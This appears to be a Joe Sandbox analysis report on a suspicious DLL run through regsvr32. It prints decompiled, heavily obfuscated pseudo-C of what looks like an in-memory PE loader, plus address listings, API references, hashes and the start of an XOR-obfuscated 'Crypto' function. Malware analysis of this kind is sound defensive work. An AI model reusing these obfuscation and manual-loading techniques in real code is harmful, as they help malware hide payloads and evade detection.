										 *((intOrPtr*)(_t1352 + 0x24)) = ( *( *((intOrPtr*)(_t1352 + 0x10)) + 0x14) & 0x0000ffff) + (_t86 *  *0x10036120 + (_t722 + 1) * _t616 + _t1114 + (_t86 *  *0x10036120 + (_t722 + 1) * _t616 + _t1114) * 4 << 4) +  *((intOrPtr*)(_t1352 + 0x10)) + 0x18;
										_t419 =  *0x10036120; // 0x0
										_t95 = _t419 + 2; // 0x2
										_t423 = ( *( *((intOrPtr*)(_t1352 + 0x10)) + 6) & 0x0000ffff) + ((_t419 + _t1262) * 0x7fffffff + (((_t1114 * _t1114 +  *(_t1352 + 0x34)) * _t616 + 1) * 0x7fffffff + _t1114) *  *0x10036110 - _t95 * _t1185 +  *(_t1352 + 0x30)) * 2;
										if(_t423 > 0) {
											_t1088 =  *0x10036120; // 0x0
											 *(_t1352 + 0x34) = (( *((intOrPtr*)(_t1352 + 0x28)) + _t1114) *  *0x10036110 + _t1262) * 0x7fffffff + (_t1088 * 0x7fffffff + _t1185 + 2) * _t616 + _t1185 * 2 << 1;
											 *(_t1352 + 0x14) =  *((intOrPtr*)(_t1352 + 0x24)) + 0xc;
											 *((intOrPtr*)(_t1352 + 0x24)) = _t423;
											do {
												_t600 =  *((intOrPtr*)( *(_t1352 + 0x14) + 4));
												if(_t600 != 0) {
													_t601 = _t600 + (( *(_t1352 + 0x2c) + _t1185) * 0x7fffffff + _t1114 * _t1262) * 2;
													_t891 =  *( *(_t1352 + 0x14));
												} else {
													_t1107 =  *0x10036120; // 0x0
													_t614 =  *0x10036110; // 0x0
													_t601 =  *( *(_t1352 + 0x14)) + ((_t1107 + _t1185 + _t1262) * 0x7fffffff + (( *(_t1352 + 0x2c) * _t616 * 0x7fffffff + _t1114 + 1) * _t1114 + 0x7ffffffe) * _t616 + _t614 + _t1114) * 2;
													_t891 =  *(_t1352 + 0x1c);
												}
												_t602 = _t601 + _t891;
												 *((intOrPtr*)(_t1352 + 0x28)) = _t602;
												if(_t602 >  *(_t1352 + 0x34) +  *((intOrPtr*)(_t1352 + 0x18))) {
													_t605 =  *0x10036120; // 0x0
													 *((intOrPtr*)(_t1352 + 0x18)) =  *((intOrPtr*)(_t1352 + 0x28)) + (_t1185 * 0x7fffffff + _t616 * 0x7ffffffd + _t1262 + (( *(_t1352 + 0x30) * _t1262 + 0x7fffffff) * _t605 * _t1185 + _t1114 * 0x7fffffff) * _t605 + (_t1185 + _t1114) *  *0x10036110) * 2;
												}
												_t604 =  *((intOrPtr*)(_t1352 + 0x24)) - 1;
												 *(_t1352 + 0x14) =  *(_t1352 + 0x14) + 0x28;
												 *((intOrPtr*)(_t1352 + 0x24)) = _t604;
											} while (_t604 != 0);
										}
										 *0x1003817c(_t1352 + 0x38 - (_t1185 + _t1185 * 8 << 2));
										_t1116 =  *0x10036110; // 0x0
										_t1264 =  *0x10036118; // 0x0
										_t617 =  *0x10036120; // 0x0
										 *(_t1352 + 0x14) = _t1116 *  *0x1003611c;
										 *(_t1352 + 0x30) = _t1264 + _t1264 * 2 << 1;
										_t744 =  *0x10036114; // 0x0
										 *(_t1352 + 0x34) = _t617 *  *0x1003610c;
										_t435 =  *0x1003611c; // 0x0
										_t440 = E100024F0((2 - _t1264) *  *0x1003611c - (_t1116 * _t1264 + 3) * _t1116 + _t617 * _t617 + 4 - (_t1264 + _t1264 * 2 << 1) +  *((intOrPtr*)(_t1352 + 0x3c)),  *((intOrPtr*)( *((intOrPtr*)(_t1352 + 0x10)) + 0x50)) + (_t1264 * 0x3fffffff + _t617 * 0x3ffffffe + _t435 + ((_t617 *  *0x1003610c + 0x3ffffffe) * _t435 + 2 + _t744 * 0x3fffffff) *  *0x10036114 - ( *(_t1352 + 0x14) + 1) * _t1116) * 4);
										_t981 =  *0x10036114; // 0x0
										_t760 =  *0x1003611c; // 0x0
										 *((intOrPtr*)(_t1352 + 0x20)) = _t440 + _t1116 * _t1116 + _t617 + _t981 * 2 + (_t1116 * _t1116 + _t617 + _t981 * 2) * 2 + ( *((intOrPtr*)(_t1352 + 0x18)) -  *((intOrPtr*)(_t1352 + 0x38)) + ( *((intOrPtr*)(_t1352 + 0x18)) -  *((intOrPtr*)(_t1352 + 0x38))) * 2 - 3) * _t760 -  *(_t1352 + 0x34);
										_t442 =  *0x1003610c; // 0x0
										_t448 = E100024F0((2 - _t442 + _t442) * _t1116 - _t617 + _t617 +  *((intOrPtr*)(_t1352 + 0x40)),  *(_t1352 + 0x1c) + (_t1264 * 0x7fffffff + _t1116 * 0x7ffffffe +  *0x1003611c + (_t442 * 0x7fffffff + _t760) *  *0x10036114 - (_t1116 * _t617 + 6) * _t617) * 2);
										_t1353 = _t1352 + 8;
										if( *((intOrPtr*)(_t1352 + 0x24)) != _t448) {
											goto L29;
										} else {
											_t449 =  *0x10036114; // 0x0
											_t768 = _t1116 * _t449;
											 *(_t1353 + 0x30) = _t768;
											_t995 =  *0x1003611c; // 0x0
											_t996 = _t995 *  *0x1003610c;
											_t175 = _t1264 * 0x7ffffffe - _t768 * _t449 *  *0x1003611c + 4; // 0x4
											 *(_t1353 + 0x3c) = _t996;
											_t997 =  *0x1003610c; // 0x0
											_t780 =  *0x1003610c; // 0x0
											_t180 = (_t617 * 0x7fffffff + _t1264 * _t1264 + _t449 + ((_t449 * _t449 * 0x7fffffff + _t996) * _t1116 * _t617 + _t997 * _t1264 + 1) *  *0x1003611c) * 2; // 0xffe
											_t450 =  *0x1003611c; // 0x0
											_t790 =  *0x1003610c; // 0x0
											_t184 = (_t617 * _t449 + _t1264) * 0x7fffffff + (( *(_t1353 + 0x3c) + 0x7fffffff) * _t1116 + 0x7fffffff) * _t1116 + _t450 + _t790 + 0x2000; // 0x2000
											_t191 = _t617 - 2; // -2
											_t618 =  *((intOrPtr*)(_t1353 + 0x20));
											_t1117 =  *((intOrPtr*)(_t1353 + 0x7c))((_t617 - ( *(_t1353 + 0x24) * _t790 << 1) + _t191) * _t617 + (( *((intOrPtr*)(_t1353 + 0x38)) + _t790) *  *0x10036114 - _t1264 + _t1264 + _t1116) * 2 +  *((intOrPtr*)(_t618 + 0x34)),  *((intOrPtr*)(_t1353 + 0x28)), (_t780 + _t780 + 0x00000002) * _t1116 + _t180 + 0x00001000 | (_t617 * _t449 + _t1264) * 0x7fffffff + (( *(_t1353 + 0x3c) + 0x7fffffff) * _t1116 + 0x7fffffff) * _t1116 + _t450 + _t790 + _t184, _t1264 * 0x7ffffffe - _t768 * _t449 *  *0x1003611c + _t175,  *((intOrPtr*)(_t1353 + 0x7c)));
											_t1354 = _t1353 + 0x14;
											 *((intOrPtr*)(_t1354 + 0x14)) = _t1117;
											if(_t1117 != 0) {
												L18:
												_t795 =  *0x10036120; // 0x0
												_t460 =  *0x10036114; // 0x0
												_t1010 =  *0x1003611c; // 0x0
												_t796 =  *0x10036118; // 0x0
												_t217 = _t1010 + 2; // 0x2
												_t1011 =  *0x10036110; // 0x0
												_t1224 =  *0x1003610c; // 0x0
												_t1271 =  *0x10036120; // 0x0
												_t464 = HeapAlloc(GetProcessHeap(), ((_t1011 * _t1011 + _t1011 * _t1011 + 2) *  *0x1003611c - _t1271 + _t1271) *  *0x1003611c + 8 + (_t796 * 0x7ffffffe + _t460 * 0x7fffffff + _t1011) * 2, _t1224 * _t796 + (_t460 + _t796) * _t1010 * 0x7fffffff - (_t795 * _t460 + 3) * _t795 - _t217 * _t1011 + _t460 + _t1224 * _t796 + (_t460 + _t796) * _t1010 * 0x7fffffff - (_t795 * _t460 + 3) * _t795 - _t217 * _t1011 + _t460 + 0x40);
												_t1013 =  *0x10036110; // 0x0
												_t1273 =  *0x1003611c; // 0x0
												_t465 =  *0x1003610c; // 0x0
												_t801 =  *0x10036120; // 0x0
												_t1274 =  *0x10036118; // 0x0
												_t1276 =  *0x10036114; // 0x0
												_t1235 = _t464 + ((_t465 - _t1013 * _t1013 - _t801 - _t1273 + 1) * _t1013 - _t1274 + _t1274 - _t801 + _t1276 + ((_t465 - _t1013 * _t1013 - _t801 - _t1273 + 1) * _t1013 - _t1274 + _t1274 - _t801 + _t1276) * 2 << 6);
												if(_t1235 != 0) {
													 *((intOrPtr*)(_t1235 + 4)) = _t1117;
													_t802 =  *0x10036118; // 0x0
													_t476 =  *0x1003610c; // 0x0
													_t1014 =  *0x10036110; // 0x0
													_t233 = ((_t476 * _t802 + _t1014) * _t1014 - _t802) * 2; // 0x2000
													 *((intOrPtr*)(_t1235 + 0x24)) =  *((intOrPtr*)(_t1354 + 0x70));
													asm("sbb edx, edx");
													 *((intOrPtr*)(_t1235 + 0x34)) =  *((intOrPtr*)(_t1354 + 0x7c));
													 *(_t1235 + 0x14) =  ~( ~((_t476 * _t802 + _t1014) * _t1014 - _t802 + _t233 + 0x00002000 &  *(_t618 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1235 + 0x20)) =  *((intOrPtr*)(_t1354 + 0x6c));
													 *((intOrPtr*)(_t1235 + 0x2c)) =  *((intOrPtr*)(_t1354 + 0x78));
													 *((intOrPtr*)(_t1235 + 0x1c)) =  *((intOrPtr*)(_t1354 + 0x68));
													 *((intOrPtr*)(_t1235 + 0x28)) =  *((intOrPtr*)(_t1354 + 0x74));
													_t1021 =  *0x1003611c; // 0x0
													_t484 =  *0x10036110; // 0x0
													_t249 = _t484 + 1; // 0x1
													_t805 =  *0x10036114; // 0x0
													 *((intOrPtr*)(_t1235 + 0x3c)) = (_t1021 - _t249 *  *0x10036118 - 2) *  *0x10036120 - _t484 * _t1021 *  *0x1003610c *  *0x10036118 - _t805 * _t1021 *  *0x1003610c + _t805 * _t1021 + _t1021 +  *((intOrPtr*)(_t1354 + 0x3c));
													_t491 =  *0x1003610c; // 0x0
													_t619 =  *0x10036120; // 0x0
													_t1286 =  *0x10036110; // 0x0
													 *((intOrPtr*)(_t1354 + 0x30)) = _t491 + _t491 * 2;
													_t256 = _t619 - 2; // -2
													_t1122 =  *0x10036114; // 0x0
													 *((intOrPtr*)(_t1354 + 0x34)) =  *((intOrPtr*)(_t618 + 0x54));
													_t808 =  *0x1003611c; // 0x0
													_t262 = _t1286 + 3; // 0x3
													_t809 =  *0x1003610c; // 0x0
													_t503 = E10002560((_t1122 + _t262) * _t808 + _t1122 + _t809 +  *0x10036118 + ((_t1122 + _t262) * _t808 + _t1122 + _t809 +  *0x10036118) * 2 + ( *((intOrPtr*)(_t1354 + 0x34)) - _t619 * _t1122 +  *0x10036118 + (_t619 * _t1122 +  *0x10036118) * 2) * _t1286 +  *((intOrPtr*)(_t1354 + 0x68)), _t256 * _t1286 - _t619 *  *0x10036118 +  *((intOrPtr*)(_t618 + 0x54)) + _t808 + _t491);
													_t1355 = _t1354 + 8;
													if(_t503 == 0) {
														L28:
														_push(_t1235);
														E100045C0();
														goto L29;
													} else {
														_t505 =  *0x1003611c; // 0x0
														_t506 =  *0x10036118; // 0x0
														_t819 =  *0x1003611c; // 0x0
														_t271 = _t819 - 1; // -1
														_t820 =  *0x1003610c; // 0x0
														_t516 =  *((intOrPtr*)(_t1355 + 0x7c))( *((intOrPtr*)(_t1355 + 0x20)), _t1122 - (_t1286 + _t820 << 1) + (_t1122 - (_t1286 + _t820 << 1)) * 2 + ((_t1122 * _t820 - _t1286 + (_t1122 * _t820 - _t1286) * 2 - 3) * _t1286 + ( *((intOrPtr*)(_t1355 + 0x3c)) + 0xfffffffd) * _t1122 + _t619 + _t619 * 2 - 6) * _t619 +  *((intOrPtr*)(_t1355 + 0x40)), _t271 * _t1122 - _t619 - _t819 - _t506 + 0x1000, 4 + (_t1286 * _t1286 * _t505 * 0x3fffffff + _t506 + (2 - _t1122 - _t505) * _t619 + _t1122 * 2) * 4,  *((intOrPtr*)(_t1355 + 0x7c)));
														_t1124 =  *0x1003610c; // 0x0
														_t823 =  *0x10036110; // 0x0
														_t1050 =  *0x10036118; // 0x0
														 *((intOrPtr*)(_t1355 + 0x44)) = _t516;
														_t517 =  *0x10036114; // 0x0
														_t622 =  *0x10036120; // 0x0
														_t287 = _t622 * _t1124 + 1; // 0x1
														memcpy( *(_t1355 + 0x48),  *(_t1355 + 0x74), ((_t622 * _t1124 + _t287) * _t1050 + _t823 * _t517 + _t823 * _t517 + _t1050) * _t622 + (_t517 * _t1124 * 0x7fffffff + _t1050 * _t1050) * 2 +  *((intOrPtr*)( *((intOrPtr*)(_t1355 + 0x24)) + 0x54)));
														_t1052 =  *0x10036120; // 0x0
														_t826 =  *0x1003611c; // 0x0
														_t525 =  *0x1003610c; // 0x0
														_t1131 =  *0x10036118; // 0x0
														_t1292 =  *0x10036114; // 0x0
														_t827 =  *0x10036110; // 0x0
														_t527 =  *0x10036118; // 0x0
														_t831 =  *((intOrPtr*)(_t1355 + 0x50)) +  *((intOrPtr*)( *((intOrPtr*)(_t1355 + 0x80)) + 0x3c)) + (((_t1292 * _t525 - _t1052 * _t1052 * _t826 * _t525 * _t1131) * _t826 + 2) * _t826 + (_t1131 - _t827 * _t827 * _t1052 - _t1052 + 2) *  *0x10036114 + _t827 * 0x7d + _t525 * 0x7c - _t527) * 4;
														 *_t1235 = _t831;
														_t1136 =  *0x10036120; // 0x0
														_t529 =  *0x1003611c; // 0x0
														_t1054 =  *0x1003610c; // 0x0
														_t300 = _t529 + 1; // 0x1
														_t1302 =  *0x10036114; // 0x0
														_t634 =  *0x10036118; // 0x0
														 *((intOrPtr*)(_t831 + 0x34)) =  *((intOrPtr*)(_t1355 + 0x34)) + 2 + (1 - _t1054) *  *0x10036110 - (_t1136 + _t300 + _t1054) * _t529 - _t1136 - _t1302 - _t634 + _t1054;
														_t1058 =  *0x10036120; // 0x0
														_t1137 =  *0x1003611c; // 0x0
														_t635 =  *0x10036118; // 0x0
														_t832 =  *0x1003610c; // 0x0
														_t636 =  *0x10036110; // 0x0
														_t637 =  *0x10036118; // 0x0
														_t638 =  *0x10036114; // 0x0
														_push((((_t1058 * _t1137 + _t635) *  *0x10036114 - _t636 + 2) * _t1058 + (_t832 - _t1137 - 1) * _t636 + (2 - _t637) * _t638 - _t1137 + _t832 + (((_t1058 * _t1137 + _t635) *  *0x10036114 - _t636 + 2) * _t1058 + (_t832 - _t1137 - 1) * _t636 + (2 - _t637) * _t638 - _t1137 + _t832) * 2 << 6) + _t1235);
														_t552 =  *0x10036118; // 0x0
														 *(_t1355 + 0x58) = ((_t552 + _t1058) * 0x3fffffff + _t832 + 2) * _t638;
														_t557 =  *0x10036110; // 0x0
														_t1310 =  *((intOrPtr*)(_t1355 + 0x34));
														_push(_t1310);
														_push( *((intOrPtr*)(_t1355 + 0x88)) + (_t832 * 0x3fffffff +  *(_t1355 + 0x58) - (_t557 * _t1137 + _t1058 + 1) * _t1137 + _t1058) * 4);
														_push( *((intOrPtr*)(_t1355 + 0x84)));
														_t562 = E100025B0();
														_t1355 = _t1355 + 0x30;
														if(_t562 == 0) {
															goto L28;
														} else {
															_t563 =  *0x10036110; // 0x0
															_t1141 =  *0x10036120; // 0x0
															_t564 =  *0x1003611c; // 0x0
															_t846 =  *((intOrPtr*)( *_t1235 + 0x34)) - _t563 * _t1141 - _t1141 - _t1141 -  *((intOrPtr*)(_t1310 + 0x34)) + _t563 + _t563 + _t564 + _t564 + _t564;
															if(_t846 == 0) {
																 *((intOrPtr*)(_t1235 + 0x18)) = 1;
															} else {
																_t1077 = _t564 *  *0x1003610c;
																_t654 =  *0x10036114; // 0x0
																_t322 = _t654 + _t564 - 2; // -2
																_t656 =  *0x1003610c; // 0x0
																_t864 =  *0x10036110; // 0x0
																_t1163 =  *0x10036114; // 0x0
																_push((_t654 + _t564 + _t322) *  *0x10036118 + _t846 + ((2 - _t1077 + _t1077) * _t654 + 2) * _t1141 + (_t864 + _t656) * 2);
																_push(((_t1077 + 0xfffffffe) *  *0x10036118 - _t1163 << 7) + (0x80 - (_t564 << 7)) *  *0x10036120 + _t1235);
																_t591 = E10003480();
																_t1083 =  *0x1003611c; // 0x0
																_t871 =  *0x10036110; // 0x0
																_t592 =  *0x10036120; // 0x0
																_t1084 =  *0x10036114; // 0x0
																_t1085 =  *0x10036118; // 0x0
																_t1355 = _t1355 + 8;
																 *((intOrPtr*)(_t1235 + 0x18)) = (_t1083 - _t871 - _t592 - 3) * _t1083 - _t592 * _t1084 *  *0x1003610c - _t871 * _t1084 * _t1085 - _t592 - _t592 - _t1085 - _t1085 + _t591 + _t871;
															}
															_t1142 =  *0x10036120; // 0x0
															_t847 =  *0x1003610c; // 0x0
															_t1063 =  *0x10036110; // 0x0
															_t1143 =  *0x10036118; // 0x0
															_t643 =  *0x1003611c; // 0x0
															_t848 =  *0x10036114; // 0x0
															_push(((_t1142 * _t847 - _t1063) * _t1142 + (_t847 - _t1143 - 2) * _t1063 + (_t643 + _t643 - _t1143) * _t847 + (_t848 - _t1063) * _t643 - _t1143 + ((_t1142 * _t847 - _t1063) * _t1142 + (_t847 - _t1143 - 2) * _t1063 + (_t643 + _t643 - _t1143) * _t847 + (_t848 - _t1063) * _t643 - _t1143) * 2 << 6) + _t1235);
															_t573 = E10003800();
															_t1355 = _t1355 + 4;
															if(_t573 == 0) {
																goto L28;
															} else {
																_t574 =  *0x1003610c; // 0x0
																_t1144 =  *0x10036120; // 0x0
																_t851 =  *0x10036110; // 0x0
																_t1067 =  *0x1003611c; // 0x0
																_t644 =  *0x10036118; // 0x0
																_push(((_t1144 * _t574 - _t851 + _t1067) *  *0x10036114 - (_t851 + _t644 << 2) + (2 - _t1067) * _t574 << 7) + _t1235);
																_t575 = E10002ED0();
																_t1355 = _t1355 + 4;
																if(_t575 == 0) {
																	goto L28;
																} else {
																	_t857 =  *0x10036120; // 0x0
																	_t1068 =  *0x10036110; // 0x0
																	_t576 =  *0x10036118; // 0x0
																	_t1072 =  *0x1003611c; // 0x0
																	_t333 = _t576 + 2; // 0x2
																	_t577 = E100033D0(((_t1072 + _t333) *  *0x10036114 - (_t857 + _t1068 * 2 + _t576 << 1) - (_t857 + _t576) *  *0x1003610c + _t1072 << 6) + _t1235);
																	_t1355 = _t1355 + 4;
																	if(_t577 != 0) {
																		_t652 =  *((intOrPtr*)( *_t1235 + 0x28));
																		if(_t652 == 0) {
																			 *((intOrPtr*)(_t1235 + 0x38)) = 0;
																			return _t1235;
																		} else {
																			_t1073 =  *0x10036114; // 0x0
																			if( *(_t1235 + 0x14) == 0) {
																				_t1315 =  *0x1003611c; // 0x0
																				_t1155 =  *0x10036118; // 0x0
																				 *((intOrPtr*)(_t1235 + 0x38)) = _t652 + (_t1073 - _t1315 - _t1155) * 2 +  *((intOrPtr*)(_t1355 + 0x14));
																				return _t1235;
																			} else {
																				_t861 =  *0x10036120; // 0x0
																				_t1157 =  *0x10036110; // 0x0
																				_t586 =  *0x10036118; // 0x0
																				 *0x1003819c = _t652 + ((_t1157 + _t1157 - _t861 * _t1073 - _t586) *  *0x1003611c - _t586 + _t586 * 2 - _t861 + _t1157 + _t1073) * 2 +  *((intOrPtr*)(_t1355 + 0x14));
																				 *((intOrPtr*)(_t1235 + 0x10)) = 1;
																				return _t1235;
																			}
																		}
																	} else {
																		goto L28;
																	}
																}
															}
														}
													}
												} else {
													_t669 =  *0x1003611c; // 0x0
													 *((intOrPtr*)(_t1354 + 0x7c))(_t1117, 0, (_t801 *  *0x1003610c + _t1013) * 0x7fffffff + _t669 + (_t801 *  *0x1003610c + _t1013) * 0x7fffffff + _t669 + 0x8000,  *((intOrPtr*)(_t1354 + 0x7c)));
													return 0;
												}
											} else {
												_t877 =  *0x10036114; // 0x0
												_t596 =  *0x1003611c; // 0x0
												_t670 =  *0x10036118; // 0x0
												_t1087 =  *0x10036120; // 0x0
												_t200 = _t1087 * 0x7ffffffe - _t877 * _t596 *  *0x1003610c - _t670 + 4; // 0x4
												_t1241 = _t877 * _t877;
												 *(_t1354 + 0x1c) = _t1241;
												_t1173 =  *0x10036110; // 0x0
												_t205 = ((_t1241 * _t670 + 2 + _t1087 * 0x7fffffff) * _t877 + (_t670 + _t1173) * 0x7fffffff) * 2; // 0x2002
												_t1350 =  *0x10036118; // 0x0
												_t599 =  *((intOrPtr*)(_t1354 + 0x7c))(0, (( ~_t1173 << 1) - (_t1087 * _t877 << 2) + 2) * _t1087 +  *((intOrPtr*)(_t1354 + 0x28)) + (_t596 + _t596 - _t1350) * 2, (0x00000002 - (_t596 * _t596 << 0x00000001)) * _t596 + _t205 + 0x00002000 | ((0x00000001 - _t1087) *  *0x1003610c - _t1173 - _t877 - 0x00000001) *  *0x10036118 + (_t1087 * _t596 * _t596 + 0x00000001) * _t1087 -  *0x1003610c +  *(_t1354 + 0x1c) + _t877 + _t596 + 0x00001000, _t1087 * 0x7ffffffe - _t877 * _t596 *  *0x1003610c - _t670 + _t200,  *((intOrPtr*)(_t1354 + 0x7c)));
												_t1354 = _t1354 + 0x14;
												 *((intOrPtr*)(_t1354 + 0x14)) = _t599;
												if(_t599 == 0) {
													goto L29;
												} else {
													_t618 =  *((intOrPtr*)(_t1354 + 0x10));
													_t1117 = _t599;
													goto L18;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x10004bb3
0x10004bba
0x10004bc5
0x10004bc9
0x10004bd3
0x10004bdb
0x10004bdf
0x10004be9
0x10004bed
0x10004bf7
0x10004c0f
0x10004c1a
0x10004c32
0x10004c81
0x10004ca0
0x10004ca8
0x10005ab1
0x10005aba
0x10004cae
0x10004cae
0x10004cb9
0x10004ce7
0x10004cf7
0x00000000
0x10004cfd
0x10004d04
0x10004d0c
0x10004d10
0x10004d1d
0x10004d25
0x10004d28
0x10004d57
0x10004d90
0x10004d95
0x10004d9a
0x00000000
0x10004da0
0x10004da0
0x10004dda
0x10004de0
0x10004de4
0x10004def
0x10004dfb
0x10004e11
0x10004e15
0x00000000
0x10004e1b
0x10004e1b
0x10004e21
0x10004e24
0x10004e27
0x10004e2e
0x10004e39
0x10004e52
0x00000000
0x10004e58
0x10004e5b
0x10004e68
0x10004e92
0x00000000
0x10004e98
0x10004e9e
0x10004ec3
0x10004ecb
0x10004ee3
0x10004f01
0x10004f06
0x10004f10
0x10004f3b
0x10004f46
0x10004f4a
0x10004f50
0x10004f54
0x10004f59
0x10004fb5
0x10004fbc
0x10004f5b
0x10004f62
0x10004f72
0x10004f99
0x10004f9c
0x10004f9c
0x10004fc2
0x10004fcc
0x10004fd0
0x10004fd6
0x10005020
0x10005020
0x1000502f
0x10005030
0x10005034
0x10005034
0x10004f50
0x1000504b
0x10005051
0x10005057
0x1000505d
0x1000506c
0x100050aa
0x100050ae
0x100050b4
0x100050c0
0x10005104
0x10005109
0x1000512a
0x1000513b
0x1000513f
0x1000519a
0x100051a3
0x100051a8
0x00000000
0x100051ae
0x100051ae
0x100051b9
0x100051bc
0x100051cb
0x100051d1
0x100051e2
0x100051fa
0x100051fe
0x1000521b
0x10005233
0x1000524c
0x10005266
0x1000526e
0x1000529e
0x100052a5
0x100052b8
0x100052ba
0x100052bf
0x100052c3
0x100053c6
0x100053c6
0x100053cc
0x100053d1
0x100053e2
0x100053f6
0x100053f9
0x10005404
0x1000541d
0x10005453
0x10005459
0x1000545f
0x10005467
0x10005473
0x1000547d
0x1000548b
0x1000549b
0x1000549d
0x100054d7
0x100054da
0x100054e0
0x100054e5
0x100054f5
0x1000550a
0x10005513
0x10005515
0x1000551a
0x10005521
0x10005528
0x1000552b
0x10005532
0x10005535
0x1000553b
0x10005540
0x1000555b
0x10005589
0x1000558c
0x10005594
0x1000559a
0x100055a3
0x100055a7
0x100055b8
0x100055c0
0x100055c4
0x100055e3
0x100055ed
0x10005609
0x1000560e
0x10005613
0x10005aa8
0x10005aa8
0x10005aa9
0x00000000
0x10005619
0x1000561d
0x1000563a
0x10005651
0x10005657
0x10005661
0x100056ab
0x100056af
0x100056b5
0x100056bb
0x100056c1
0x100056c5
0x100056dd
0x100056e8
0x1000570f
0x10005715
0x1000571d
0x10005726
0x10005731
0x10005737
0x10005751
0x10005776
0x1000578e
0x10005790
0x10005792
0x10005798
0x1000579d
0x100057a3
0x100057a7
0x100057c2
0x100057d9
0x100057dc
0x100057e2
0x100057e8
0x100057ee
0x10005802
0x10005818
0x10005827
0x1000583e
0x1000583f
0x10005859
0x1000585d
0x10005865
0x1000588b
0x1000588c
0x1000588d
0x1000588e
0x10005893
0x10005898
0x00000000
0x1000589e
0x1000589e
0x100058a3
0x100058c2
0x100058cb
0x100058cd
0x1000599f
0x100058d3
0x100058d5
0x100058e6
0x100058f7
0x10005902
0x1000590a
0x10005917
0x1000591d
0x10005942
0x10005943
0x10005948
0x1000594e
0x1000595a
0x10005967
0x10005980
0x10005995
0x1000599a
0x1000599a
0x100059a6
0x100059ac
0x100059b2
0x100059c2
0x100059d4
0x100059e2
0x100059fb
0x100059fc
0x10005a01
0x10005a06
0x00000000
0x10005a0c
0x10005a0c
0x10005a11
0x10005a17
0x10005a20
0x10005a26
0x10005a4f
0x10005a50
0x10005a55
0x10005a5a
0x00000000
0x10005a5c
0x10005a5c
0x10005a62
0x10005a68
0x10005a76
0x10005a7c
0x10005a9c
0x10005aa1
0x10005aa6
0x10005abd
0x10005ac2
0x10005b4b
0x10005b5a
0x10005ac8
0x10005acd
0x10005ad3
0x10005b24
0x10005b2a
0x10005b3e
0x10005b49
0x10005ad5
0x10005ad5
0x10005adb
0x10005aeb
0x10005b0e
0x10005b14
0x10005b23
0x10005b23
0x10005ad3
0x00000000
0x00000000
0x00000000
0x10005aa6
0x10005a5a
0x10005a06
0x10005898
0x1000549f
0x100054a6
0x100054c6
0x100054d6
0x100054d6
0x100052c9
0x100052c9
0x100052cf
0x100052d8
0x100052eb
0x100052fd
0x10005303
0x10005307
0x1000531a
0x1000533e
0x10005383
0x100053ad
0x100053b1
0x100053b6
0x100053ba
0x00000000
0x100053c0
0x100053c0
0x100053c4
0x00000000
0x100053c4
0x100053ba
0x100052c3
0x100051a8
0x10004e92
0x10004e52
0x10004e15
0x10004d9a
0x10004cf7

APIs

GetNativeSystemInfo.KERNELBASE(?,7FFFFFFE,00000000,?,?,?,?,?,?,?,?,?,?,1000640C,00000000,00000000), ref: 1000504B
GetProcessHeap.KERNEL32(?,?), ref: 1000544C
HeapAlloc.KERNEL32(00000000), ref: 10005453
memcpy.MSVCRT ref: 1000570F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocInfoNativeProcessSystemmemcpy
String ID:
API String ID: 1755227880-0
Opcode ID: 993f834cee51f2432c2c346b15c4fd7da4b8477cae012179afaf0030763fae0d
Instruction ID: f49f43f9c300581c81497aa9a595f87392b237f3bd22c5b5458b9e07c05fb177
Opcode Fuzzy Hash: 993f834cee51f2432c2c346b15c4fd7da4b8477cae012179afaf0030763fae0d
Instruction Fuzzy Hash: 6CA283327002158FD70DCF28CED6555BBEAF7CE310B09D62ED9158F3A6EA74A905CA80

Uniqueness

Uniqueness Score: -1.00%

Function 04F70F57 Relevance: 6.6, Strings: 5, Instructions: 370
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E04F70F57(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t352;
				signed int _t367;
				signed int _t371;
				signed int _t383;
				void* _t384;
				void* _t385;
				signed int _t389;
				signed int _t391;
				intOrPtr _t392;
				signed int _t393;
				signed int _t394;
				signed int _t400;
				intOrPtr* _t430;
				void* _t432;
				signed int _t433;
				signed int _t436;
				signed int _t437;
				signed int* _t440;
				void* _t442;

				_t392 = __ecx;
				_push(_a8);
				_v68 = __ecx;
				_push(_a4);
				_v32 = __edx;
				_push(__edx);
				_push(__ecx);
				E04F732C4(__edx);
				_v16 = 0xf117d;
				_t438 = 0;
				_v12 = 0x5f0b6;
				_t440 =  &(( &_v88)[4]);
				_v8 = 0x2d0d0;
				_t433 = 0x11183;
				_v4 = 0;
				_t391 = 0;
				_v44 = 0xb49d09;
				_v44 = _v44 + 0xffffdb47;
				_v44 = _v44 ^ 0x00b67850;
				_t411 = _v44;
				_v60 = 0xc0d541;
				_v60 = _v60 | 0xeffdfadf;
				_v60 = _v60 ^ 0xeffddfdf;
				_t430 = _v28;
				_v64 = _v44;
				_v36 = _v60;
				while(1) {
					L1:
					_t352 = _v60;
					while(1) {
						_t442 = _t433 - 0x55fb8;
						if(_t442 <= 0) {
						}
						L3:
						if(_t442 == 0) {
							_v48 = 0x26cc0d;
							_v48 = _v48 + 0x8a72;
							_v48 = _v48 ^ 0x0027567e;
							_v44 = 0x33e15;
							_t400 = 5;
							_v44 = _v44 * 0x53;
							_v44 = _v44 ^ 0x010a15a8;
							_v72 = 0xae6278;
							_v72 = _v72 * 0x23;
							_v72 = _v72 << 0xc;
							_v72 = _v72 ^ 0x77644b27;
